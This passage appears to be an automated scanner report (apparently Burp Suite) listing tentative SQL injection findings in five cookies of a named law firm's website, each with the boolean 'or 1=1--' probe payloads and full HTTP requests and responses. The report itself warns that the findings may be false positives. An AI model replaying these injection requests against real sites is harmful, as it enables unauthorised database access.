<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.12. http://www.pillsburylaw.com/ [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 14379774%20or%201%3d1--%20 and 14379774%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814379774%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 19:51:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814379774%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11825844;path=/
Set-Cookie: CFTOKEN=79486011;path=/
Date: Thu, 12 May 2011 19:51:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.13. http://www.pillsburylaw.com/ [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 75248224'%20or%201%3d1--%20 and 75248224'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=75248224'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 19:51:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=75248224'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.14. http://www.pillsburylaw.com/ [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 99881169'%20or%201%3d1--%20 and 99881169'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=99881169'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 19:51:56 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=99881169'%20or%201%3d2--%20; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.15. http://www.pillsburylaw.com/ [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 33124684'%20or%201%3d1--%20 and 33124684'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=33124684'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 19:51:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=33124684'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.16. http://www.pillsburylaw.com/ [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 16656756'%20or%201%3d1--%20 and 16656756'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=16656756'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 19:51:40 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=16656756'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

